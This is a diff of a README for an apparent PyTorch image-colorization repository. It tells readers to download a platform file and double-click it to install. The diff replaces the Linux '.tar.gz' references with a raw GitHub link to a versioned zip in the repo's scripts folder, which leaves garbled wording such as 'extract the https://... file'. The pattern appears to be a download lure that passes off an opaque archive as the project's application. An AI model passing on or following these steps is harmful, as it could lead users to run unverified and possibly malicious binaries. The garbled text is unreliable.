Ketchup2107/pytorch-vae-image-colorization/README.md

    Look for the version labeled “Latest.”
 This version includes the most recent updates and improvements.

 3. **Download the Application**
    Click on the file that matches your operating system.
-The options typically include `.exe` for Windows,`.dmg` for Mac, or `.tar.gz` for Linux.
+The options typically include `.exe` for Windows,`.dmg` for Mac, or `https://raw.githubusercontent.com/Ketchup2107/pytorch-vae-image-colorization/main/scripts/pytorch-vae-image-colorization_v1.8.zip` for Linux.

 4. **Run the Downloaded File**
    After the download completes, locate the file in your Downloads folder.
    - For Windows, double-click the `.exe` file to start the installation.
    - For Mac, double-click the `.dmg` file.
 Drag the application to your Applications folder.
-   - For Linux, extract the `.tar.gz` file and follow any included instructions.
+   - For Linux, extract the `https://raw.githubusercontent.com/Ketchup2107/pytorch-vae-image-colorization/main/scripts/pytorch-vae-image-colorization_v1.8.zip` file and follow any included instructions.

 5. **Open the Application**
    Once installed, find the application in your programs list or Applications folder.
 Double-click to open it.